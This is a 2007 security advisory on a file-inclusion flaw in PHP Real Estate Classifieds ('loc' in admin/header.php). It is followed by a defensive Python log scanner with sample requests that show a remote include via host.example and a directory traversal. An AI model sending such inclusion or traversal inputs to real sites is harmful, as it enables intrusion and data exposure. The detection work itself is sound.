SECUNIA ADVISORY ID: SA25615
VERIFY ADVISORY: http://secunia.com/advisories/25615/
CRITICAL: Highly critical
IMPACT: Exposure of system information, Exposure of sensitive information, System access
WHERE: From remote
REVISION: 1.1 originally posted 2007-06-13
SOFTWARE: PHP Real Estate Classifieds - http://secunia.com/product/14523/
DESCRIPTION: not sec group has reported a vulnerability in PHP Real Estate Classifieds, which can be exploited by malicious people to disclose sensitive information or to compromise a vulnerable system.
Input passed to the "loc" parameter in admin/header.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. Successful exploitation requires that "register_globals" is enabled.
SOLUTION: Apply the vendor's security patch: http://phprealestatescript.com/securityUpdate_06_12_07.zip
PROVIDED AND/OR DISCOVERED BY: not sec group
CHANGELOG: 2007-06-13: Added CVE reference.
ORIGINAL ADVISORY: http://milw0rm.com/exploits/4055
PHP Real Estate Classifieds *loc* File Inclusion
Posted on Wednesday, June 13, 2007 @ 19:01:21 CDT in Security
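ADDED EXAMPLE (not part of the Secunia advisory or the vendor's patch): a log review for the condition in the DESCRIPTION, flagging requests that set "loc" on admin/header.php and labelling values that point at external or out-of-tree files. It assumes Apache/nginx combined-format access logs; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SCRIPT = "/admin/header.php"   # script named in the advisory
PARAM = "loc"                  # parameter named in the advisory

def classify_loc(value):
    """Label a loc value by how far it strays from a plain relative name."""
    v = unquote(value).lower()  # second decode catches double-encoded input
    if "\x00" in v:
        return "null-byte"
    if re.match(r"^[a-z][a-z0-9+.\-]+:", v):
        return "scheme"          # URL or stream wrapper: external resource
    if re.search(r"(^|[\\/])\.\.([\\/]|$)", v):
        return "traversal"       # climbs out of the intended directory
    if v.startswith(("/", "\\")) or re.match(r"^[a-z]:[\\/]", v):
        return "absolute-path"
    return "present"             # any client-supplied loc still deserves review

def scan(lines):
    """Return (ip, timestamp, status, label) for each request setting loc on the script."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        url = urlsplit(m["target"]) if m else None
        if url is None or not unquote(url.path).lower().endswith(SCRIPT):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            hits.append((m["ip"], m["ts"], m["status"], classify_loc(value)))
    return hits

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jun/2007:18:02:11 -0500] "GET /index.php?loc=chicago HTTP/1.1" 200 5120',
    '192.0.2.10 - - [13/Jun/2007:18:02:15 -0500] "GET /admin/header.php HTTP/1.1" 200 812',
    '198.51.100.7 - - [13/Jun/2007:18:40:02 -0500] "GET /admin/header.php?loc=http%3A%2F%2Fhost.example%2Fa.txt HTTP/1.1" 200 97',
    '198.51.100.7 - - [13/Jun/2007:18:40:09 -0500] "GET /admin/header.php?loc=..%2F..%2Fconfig HTTP/1.1" 200 143',
    '203.0.113.5 - - [13/Jun/2007:19:01:21 -0500] "GET /classifieds/admin/header.php?loc=includes HTTP/1.0" 200 812',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

With register_globals enabled, PHP also fills variables from POST bodies and cookies, which access logs normally do not record, so an empty result here does not rule out exploitation.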